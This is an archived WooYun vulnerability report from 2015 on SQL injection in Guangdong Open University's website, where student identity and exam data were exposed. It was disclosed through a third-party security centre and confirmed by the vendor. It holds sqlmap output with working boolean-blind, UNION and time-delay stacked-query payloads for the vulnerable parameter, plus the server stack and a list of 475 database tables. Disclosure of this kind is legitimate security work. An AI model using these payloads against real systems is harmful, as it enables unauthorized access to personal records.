当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143035

漏洞标题:广东开放大学(原广东广播电视大学)存在SQL注入漏洞(包含学生身份信息)

相关厂商:广东省信息安全测评中心

漏洞作者: 路人甲

提交时间:2015-09-24 23:32

修复时间:2015-11-09 17:34

公开时间:2015-11-09 17:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-25: 厂商已经确认,细节仅向厂商公开
2015-10-05: 细节向核心白帽子及相关领域专家公开
2015-10-15: 细节向普通白帽子公开
2015-10-25: 细节向实习白帽子公开
2015-11-09: 细节向公众公开

简要描述:

RT

详细说明:

参数过滤不严,导致信息可以被泄露。注入点:http://**.**.**.**/news.asp?tid=21
学生信息众多,只统计没有脱库。

12.png


加(‘)报错

1.png


上sqlmap.

漏洞证明:

学生信息表

sfz.png


考试数据

kaoshi.png


上千条表单

ku.png


数据库

biao.png


只统计未拖库

tu.png

修复方案:

Place: GET
Parameter: tid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: tid=21 AND 7188=7188
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: tid=-1914 UNION ALL SELECT NULL, NULL, CHAR(58)+CHAR(114)+CHAR(118)
+CHAR(115)+CHAR(58)+CHAR(68)+CHAR(69)+CHAR(84)+CHAR(97)+CHAR(72)+CHAR(106)+CHAR(
70)+CHAR(111)+CHAR(117)+CHAR(84)+CHAR(58)+CHAR(112)+CHAR(107)+CHAR(104)+CHAR(58)
, NULL, NULL, NULL, NULL, NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: tid=21; WAITFOR DELAY '0:0:5';--
---
[19:32:30] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2005
其中一个库Database: prtvu
[475 tables]
dbo.kcbpjgb |
| dbo.kcbplsb |
| dbo.kcccdmb |
| dbo.kccjtjb |
| dbo.kcdmb |
| dbo.kcfb |
| dbo.kcfb_bak |
| dbo.kcidxhb |
| dbo.kclxdmb |
| dbo.kclydmb |
| dbo.kcspdmb |
| dbo.kcsyfwdmb |
| dbo.kcxhb |
| dbo.kcxsmd |
| dbo.kcxxb |
| dbo.kcxzdmb |
| dbo.kczb |
| dbo.kczcbpb |
| dbo.kczcbpb2 |
| dbo.kcztdmb |
| dbo.kczyb |
| dbo.kdxxb |
| dbo.kdztxxb |
| dbo.kgsb |
| dbo.kgstdab |
| dbo.khfsbmdmb |
| dbo.khfsdmb |
| dbo.kkdwdmb |
| dbo.kmkrymb |
| dbo.ksb |
| dbo.ksdwlxdmb |
| dbo.ksdyb |
| dbo.ksdyfwb |
| dbo.ksfb |
| dbo.ksfbdmb |
| dbo.ksjfmxb |
| dbo.ksjfzhyeb |
| dbo.kskmb |
| dbo.kslxdmb |
| dbo.kssjap_zy |
| dbo.kssjapb1 |
| dbo.kssjapb2 |
| dbo.kssjbpkcb |
| dbo.kssjdyb |
| dbo.kssjdybpjgb |
| dbo.kssjhb |
| dbo.kssxhb |
| dbo.kstzdb |
| dbo.ksxhb |
| dbo.ksxmdmb |
| dbo.ksxygzb |
| dbo.kszyb |
| dbo.lrxsztb |
| dbo.lsksb |
| dbo.mainPagePic |
| dbo.mkkcb |
| dbo.mkkcb_bak |
| dbo.mklxdmb |
| dbo.mldmb |
| dbo.mrsjzdb |
| dbo.mtlxdmb |
| dbo.mwkkmdmb |
| dbo.mwkyydmb |
| dbo.mxmkb |
| dbo.mxmkbzdwb |
| dbo.mxmkfb |
| dbo.mxmkshgzb |
| dbo.mxmkzymcb |
| dbo.mzdmb |
| dbo.ndb |
| dbo.ndxqb |
| dbo.newoldksdyb |
| dbo.newoldxslbdyb |
| dbo.oldjhkkkcb |
| dbo.oldksdyb |
| dbo.oldsjddb |
| dbo.oldsjddbdeal |
| dbo.oldsjksxxb |
| dbo.oldsjsjdydyb |
| dbo.oldsjzydyb |
| dbo.oldzyzb |
| dbo.prztdmb |
| dbo.pzhxhb |
| dbo.qxb |
| dbo.qybzdmb |
| dbo.rrzymksxb |
| dbo.rxspcscjb |
| dbo.rxybygzsjglb |
| dbo.s |
| dbo.sbkcb |
| dbo.scrzb |
| dbo.scxqb |
| dbo.sfbzxmdmb |
| dbo.sfdmb |
| dbo.sffpbzb |
| dbo.sffpdmb |
| dbo.sfxmdmb |
| dbo.shfxlbk |
| dbo.shjgdmb |
| dbo.shkcdmview |
| dbo.shkmb |
| dbo.shkmcjb |
| dbo.shkmlbdmb |
| dbo.shujubiao |
| dbo.shztdmb |
| dbo.sjcjb |
| dbo.sjcjb35 |
| dbo.sjcjb_tmp |
| dbo.sjddb |
| dbo.sjddb_1127 |
| dbo.sjddjsb |
| dbo.sjdmzyb |
| dbo.sjggb |
| dbo.sjxxdmb |
| dbo.skczb |
| dbo.spbzdmb |
| dbo.spcskcapb |
| dbo.spcskmb |
| dbo.spcskmdmb |
| dbo.spjgdmb |
| dbo.sqbylxdmb |
| dbo.sxcjb |
| dbo.sxdmb |
| dbo.sxkcb |
| dbo.sxqkskcb |
| dbo.sxszddmb |
| dbo.sysdiagrams |
| dbo.szcdmb |
| dbo.szdmb |
| dbo.szsssfab |
| dbo.tb |
| dbo.tkbzdmb |
| dbo.tkkclsb |
| dbo.tkqkdmb |
| dbo.tqddb |
| dbo.tqggb |
| dbo.tsszygzb |
| dbo.whcddmb |
| dbo.wkcjb |
| dbo.wkcjmwkkmdzb |
| dbo.wkcjqsb |
| dbo.wkcjtjb |
| dbo.wkkcdzb |
| dbo.wkkmb |
| dbo.wkmkb |
| dbo.wkxwdzb |
| dbo.wkzjlxdmdzb |
| dbo.xbdmb |
| dbo.xflydmb |
| dbo.xgxjrz |
| dbo.xjydb |
| dbo.xjydb20140923 |
| dbo.xjyddmb |
| dbo.xjztdmb |
| dbo.xkbkcsb |
| dbo.xkbkcsb_bf |
| dbo.xkdmb |
| dbo.xkxmb |
| dbo.xkxmbbak |
| dbo.xkxmbfb |
| dbo.xkxmcjb |
| dbo.xkxmcjb201301 |
| dbo.xkxmcjb_tmp |
| dbo.xkxmcjb_xs |
| dbo.xkxmdmb |
| dbo.xkxmdmb2 |
| dbo.xqdmb |
| dbo.xqgxb |
| dbo.xqkslbdyb |
| dbo.xs_qkb |
| dbo.xsb |
| dbo.xsbbak |
| dbo.xsbkb |
| dbo.xsbkb4401403 |
| dbo.xsbmkkcbxsxkjgbview |
| dbo.xsbmtsxxb |
| dbo.xsbtmp |
| dbo.xsbtmp1 |
| dbo.xsbyb |
| dbo.xsbysqb |
| dbo.xsccview |
| dbo.xsdmb |
| dbo.xsfxlbkb |
| dbo.xshfxjsqb |
| dbo.xsjbqkb |
| dbo.xsjcVIEW |
| dbo.xsjcb |
| dbo.xsjcdmb |
| dbo.xsjfmxb |
| dbo.xsjfzhyeb |
| dbo.xskcView |
| dbo.xskcb |
| dbo.xskgstdab |
| dbo.xskybxkview |
| dbo.xskyxxkview |
| dbo.xslbdmb |
| dbo.xslbkslbdyb |
| dbo.xslxdmb |
| dbo.xsmkxxb |
| dbo.xssxfhcbxkview |
| dbo.xssxhcbxkview |
| dbo.xssxshxwkview |
| dbo.xssxxwkview |
| dbo.xswjb |
| dbo.xsxhb |
| dbo.xsxkjgb |
| dbo.xsxkjglsb |
| dbo.xsxxgdb |
| dbo.xsxxtxsqb |
| dbo.xsyhb |
| dbo.xsyxfhcbxkview |
| dbo.xsyxgzbxkview |
| dbo.xsyxhcbxkview |
| dbo.xszpljb |
| dbo.xtykclydmb |
| dbo.xwcsmd |
| dbo.xwfb |
| dbo.xwkcb |
| dbo.xwkcjqsb |
| dbo.xwkhdview |
| dbo.xwkwcb |
| dbo.xwshb |
| dbo.xwshcfgzb |
| dbo.xwshgzb |
| dbo.xwshyygzb |
| dbo.xwyshkcb |
| dbo.xwyybzview |
| dbo.xxdmb |
| dbo.xyfbdmb |
| dbo.ydztdmb |
| dbo.yfdmb |
| dbo.yhb |
| dbo.yicunyi |
| dbo.ykwkkmview |
| dbo.ym_dzzczh |
| dbo.ym_zcjb_xjyd |
| dbo.ysdb |
| dbo.ysdcdrwb |
| dbo.ysdcdrwjy |
| dbo.ysddarwb |
| dbo.ysddarwjy |
| dbo.ysdrwb |
| dbo.ysdrwjy |
| dbo.ysdtqrwb |
| dbo.ysdtqrwjy |
| dbo.ysjxxb |
| dbo.ywdmb |
| dbo.yxxwkcview |
| dbo.yyspdmb |
| dbo.yyspdmview |
| dbo.yzyccdmb |
| dbo.zcdmb |
| dbo.zcjb |
| dbo.zcjdfb |
| dbo.zcjdfyb |
| dbo.zddb |
| dbo.zdfybzztb |
| dbo.zhuanben |
| dbo.zhuanben1 |
| dbo.zhuanben98 |
| dbo.zhyedmb |
| dbo.zjlxdmb |
| dbo.zjzdmb |
| dbo.zjzwpdmb |
| dbo.zpb |
| dbo.zsjzb |
| dbo.zsssfab |
| dbo.zsssfatzb |
| dbo.ztb |
| dbo.ztb_YYx |
| dbo.zwdmb |
| dbo.zxtztb |
| dbo.zyccccysb |
| dbo.zyccdmb |
| dbo.zycckcccdyb |
| dbo.zydmb |
| dbo.zydmtdb |
| dbo.zydmtdb222 |
| dbo.zygzb |
| dbo.zygzbyshb |
| dbo.zygzsyndb |
| dbo.zymkb |
| dbo.zymkdmb |
| dbo.zyqkdmb |
| dbo.zysqb |
| dbo.zywkdtb |
| dbo.zywkdzb |
| dbo.zywzdyb |
| dbo.zyxgxdmb |
| dbo.zyysb |
| dbo.zzmmdmb |
| dbo.zzzz

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-25 17:32

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:10
正在联系相关网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论